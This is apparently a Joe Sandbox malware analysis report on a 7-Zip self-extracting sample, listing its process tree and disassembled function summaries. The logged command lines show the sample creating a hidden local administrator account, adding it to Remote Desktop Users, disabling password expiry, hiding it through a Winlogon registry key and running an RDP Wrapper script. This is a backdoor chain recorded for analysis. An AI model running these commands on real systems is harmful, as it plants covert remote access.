MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	02:20:45
Start date:	27/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic group where sid="S-1-5-32-544" get name /value
Imagebase:	0x7ff692340000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	02:20:47
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
Imagebase:	0x7ff71e800000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	02:20:47
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic group where sid="S-1-5-32-555" get name /value
Imagebase:	0x7b0000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	02:20:48
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
Imagebase:	0x7ff7c9e40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	02:20:48
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	02:20:49
Start date:	27/12/2024
Path:	C:\Windows\System32\fsutil.exe
Wow64 process (32bit):	false
Commandline:	fsutil dirty query C:
Imagebase:	0x7ff6cc600000
File size:	214'840 bytes
MD5 hash:	DE00EDA7134D3365E6074700E3008CAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	02:20:50
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user fsUIwEqMAc zyTFxcsIkA /add
Imagebase:	0x9e0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	02:20:50
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add
Imagebase:	0x8e0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	02:20:51
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup Administrators fsUIwEqMAc /add
Imagebase:	0x9e0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	02:20:52
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add
Imagebase:	0x8e0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	02:20:52
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
Imagebase:	0x7ff7c9e40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	02:20:52
Start date:	27/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic group where sid="S-1-5-32-555" get name /value
Imagebase:	0x7ff692340000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	02:20:52
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Remote Desktop Users" fsUIwEqMAc /add
Imagebase:	0x9e0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	02:20:52
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add
Imagebase:	0x8e0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	02:20:53
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net accounts /maxpwage:unlimited
Imagebase:	0x9e0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	02:20:53
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 accounts /maxpwage:unlimited
Imagebase:	0x8e0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	02:20:54
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
Imagebase:	0xf30000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	24.6%
Total number of Nodes:	1775
Total number of Limit Nodes:	46

Executed Functions

Function 00406128 Relevance: 193.6, APIs: 70, Strings: 40, Instructions: 1139windowCOMMON

Download Yara Rule

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 0040613B

Part of subcall function 0040391C: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 00403928
Part of subcall function 0040391C: CreateWindowExW.USER32(00000080,tooltips_class32,sfx,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403945
Part of subcall function 0040391C: GetDesktopWindow.USER32 ref: 00403951
Part of subcall function 0040391C: GetWindowRect.USER32(00000000), ref: 00403958
Part of subcall function 0040391C: SetWindowPos.USER32(00000000,00000000,?,00406147,00000000,00000000,00000004), ref: 0040397C
Part of subcall function 0040391C: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 0040398C
Part of subcall function 0040391C: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00403999
Part of subcall function 0040391C: DispatchMessageW.USER32(?), ref: 004039A3
Part of subcall function 0040391C: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 004039AC

GetVersionExW.KERNEL32(?,?,00000000), ref: 00406158
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00407105

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 00405502: LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 00405513
Part of subcall function 00405502: #17.COMCTL32(?,?,00000000), ref: 0040551E
Part of subcall function 00405502: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004055A3
Part of subcall function 00405502: wsprintfW.USER32 ref: 004055B7

GetCommandLineW.KERNEL32(?,00000000), ref: 004061B1

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046D9
Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046F5
Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046FD
Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 00404768

Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,0041ADC8,?,?,?,00000000), ref: 004050B8
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004050C1
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004050C9

GetCommandLineW.KERNEL32(00000001,00000001,00000001,00000000,?,00000000), ref: 004061F7

Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 0040432C

wsprintfW.USER32 ref: 0040621D

Part of subcall function 004057A2: lstrlenW.KERNEL32(sfxlang,?,74DF1D70,?,00000001,00406248,00000001), ref: 004057E3
Part of subcall function 004057A2: lstrlenW.KERNEL32(sfxlang), ref: 004057E8

_wtol.MSVCRT ref: 00406256
??3@YAXPAX@Z.MSVCRT(?), ref: 00406291
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00406299
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004062A1
GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,00000001), ref: 004062FB
_wtol.MSVCRT ref: 00406413

Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT(00000004,0041E844,004065C3,00000000,0041E844,0041E844), ref: 0041174B

Part of subcall function 00405401: ??3@YAXPAX@Z.MSVCRT(?), ref: 00405445

??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041E844,0041E844), ref: 004065E7
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,0041E844,0041E844), ref: 00406658

Strings

Delete, xrefs: 00406FD7
Shortcut, xrefs: 00406FB4
BeginPromptTimeout, xrefs: 00406A89
SfxVarModulePlatform, xrefs: 004061DA
InstallPath, xrefs: 00406A5E
DA, xrefs: 004064BF
HA, xrefs: 00406679
PreExtract, xrefs: 00406DA2, 00406DA7
BeginPrompt, xrefs: 00406B56
SfxVarApiPath, xrefs: 00406AD1, 00406B0F, 00406DE7
x86, xrefs: 004061D5
AutoInstall, xrefs: 00406BC7, 00406C16
sfxlang, xrefs: 0040623C
123456789ABCDEFGHJKMNPQRSTUVWXYZ, xrefs: 0040672A
setup.exe, xrefs: 00406ECD, 00406ED2, 00406F5C
" -, xrefs: 00406861
SfxVarCmdLine0, xrefs: 004061FB
SfxVarSystemPlatform, xrefs: 004061EC
7-Zip SFX, xrefs: 004070F9
sfxelevation, xrefs: 004062CB, 0040685C
sfxwaitall, xrefs: 004062B0
FinishMessage, xrefs: 00407027
ExecuteFile, xrefs: 00406C2D, 00406C3F
DA, xrefs: 004062EB
sfxversion, xrefs: 00406277
sfxconfig, xrefs: 00406468, 004065FA
RunProgram, xrefs: 00406C52, 00406C64
PA, xrefs: 00406582
SfxAuthor, xrefs: 004066E0
7ZipSfx.%03x, xrefs: 00406D0B
hA, xrefs: 00406AEE
HelpText, xrefs: 004069DE
\A, xrefs: 00406545
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 004070FE
SfxString%d, xrefs: 00406687
sfxtest, xrefs: 0040631E
SfxVarSystemLanguage, xrefs: 00406232
SelfDelete, xrefs: 00407098
ExecuteOnLoad, xrefs: 00406AE0
SetEnvironment, xrefs: 00406953

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$Window$??2@Message$CommandLineModuleTimer_wtollstrlenwsprintf$?_set_new_handler@@CreateDesktopDispatchFileFolderHandleKillLibraryLoadNamePathRectSpecialVersionmemcpywcsncpy
String ID: " -$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$DA$DA$ExecuteFile$ExecuteOnLoad$FinishMessage$HelpText$HA$InstallPath$PreExtract$PA$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$SfxString%d$SfxVarApiPath$SfxVarCmdLine0$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$\A$hA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxtest$sfxversion$sfxwaitall$x86
API String ID: 15977253-2458474990
Opcode ID: 596220ad49d5476e6c40ea6e675c02c1c220145f7c39a02eb6dcd5ec7ae097e4
Instruction ID: e0054388adb9e1051384cab39e182934ba2a11f09d439c537bece9ac8bb84f3b
Opcode Fuzzy Hash: 596220ad49d5476e6c40ea6e675c02c1c220145f7c39a02eb6dcd5ec7ae097e4
Instruction Fuzzy Hash: 88929234A001059AEB15BB62DC55AEE3666EF40308F15803FFD06672E2DB3C9D91CB5E

Function 004029DA Relevance: 21.3, APIs: 14, Instructions: 294
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5bfc6fbc337c81536e2efa14fd374f869994e935898830db1c690859ae3586
Instruction ID: c1d5b1038281741182b59f060de7432f6867be05cbf439a176d126074f28f510
Opcode Fuzzy Hash: ab5bfc6fbc337c81536e2efa14fd374f869994e935898830db1c690859ae3586
Instruction Fuzzy Hash: A7B19271900205EFDB14DFA0D9889EE77B5BF08314F14846AF902BB2E1D778AD85DB58

Function 004044EA Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,-00000001), ref: 00404501
FindClose.KERNEL32(00000000), ref: 00404511
SetLastError.KERNEL32(00000010), ref: 00404522

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Find$CloseErrorFileFirstLast
String ID:
API String ID: 4020440971-0
Opcode ID: 2e532512729200e784fa90409b54c7fc6bc467fc79d1b687fbef4cf578feb42b
Instruction ID: 20dcc56be40bd9a2dd23ceebfaf1f9b55074e9165e79c80e0b63e8a94ab0599c
Opcode Fuzzy Hash: 2e532512729200e784fa90409b54c7fc6bc467fc79d1b687fbef4cf578feb42b
Instruction Fuzzy Hash: F1F081F1A00114B7DB206638AC49BA637A89BC1729F140A77EB26F11D0D77CC945955E

Function 00409A19 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000024), ref: 00409A25
FindFirstFileW.KERNELBASE(0041E7B8,?,00000000,00000000,0041E7B8), ref: 00409A73
FindClose.KERNELBASE(00000000), ref: 00409A91

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Find$??2@CloseFileFirst
String ID:
API String ID: 4002974997-0
Opcode ID: 688b43709c11a5a7d08100325d9734e530e7c46e220bc9de0b863d14d6a0dd3f
Instruction ID: 793d1416ce16d4dbbc7bac0da152af532d808b73086aa34ee1095b61dd29bce3
Opcode Fuzzy Hash: 688b43709c11a5a7d08100325d9734e530e7c46e220bc9de0b863d14d6a0dd3f
Instruction Fuzzy Hash: 2A110631700111ABCB20AF24DC08AAF77A4AF45714F00443AFC46EB2D1D738DC428FA9

Function 00403FF2 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(0040682B,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041E7B8,0040682B), ref: 00404021
CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00404033
FreeSid.ADVAPI32(00000000), ref: 0040403C

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: b1a85781bd9880e8be0b06bd7447c5e118f4662a7265e0280068f0d854aaaee3
Instruction ID: 897e3d853c979f7ca1e9d36a2150445fe5287065c6dcae09f62a90d6d31b286d
Opcode Fuzzy Hash: b1a85781bd9880e8be0b06bd7447c5e118f4662a7265e0280068f0d854aaaee3
Instruction Fuzzy Hash: 35F0DAB5900208FBDB00DFD5DD89ADEBBBCFB08344F504469A605E2191D3709A149B15

Function 00402446 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00402462
SendMessageW.USER32(00008001,00000000,?), ref: 004024BB

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: ab9cdcdd9b55208fec138a9dead6acff31393ca49536454abc1c7d8bd56cf985
Instruction ID: 8208958cd5f058e564b84d0c2d53d4d01197a59289713be1c569bcd397771c57
Opcode Fuzzy Hash: ab9cdcdd9b55208fec138a9dead6acff31393ca49536454abc1c7d8bd56cf985
Instruction Fuzzy Hash: EA014B34610204BAEB149B65DE4DF9A3BA9FB01724F108476F901EA1E0DABAE940CB1D

Function 0040206F Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 0040433D: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0041E89C,?,?,00000000,00402095,00000000,0041E89C,?,00000000), ref: 0040435B
Part of subcall function 0040433D: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,?,00000000,00402095,00000000,0041E89C,?,00000000), ref: 0040436E

_wtol.MSVCRT ref: 00402130

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

??3@YAXPAX@Z.MSVCRT(?,00000000,?,0041AAE4,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004022A5
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0041AAE4,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000), ref: 004022AD
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,0041AAE4,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000), ref: 004022B5
??3@YAXPAX@Z.MSVCRT(?,00000000,0041E89C,?,00000000), ref: 004022D2
??3@YAXPAX@Z.MSVCRT(?,00000000,0041E89C,?,00000000), ref: 004022DA

Part of subcall function 00401DCA: GetCommandLineW.KERNEL32(0041A9F0,00000000,00000000), ref: 00401DEC
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401E98
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?," -), ref: 00401EA0
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?), ref: 00401EA8
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A), ref: 00401EB0
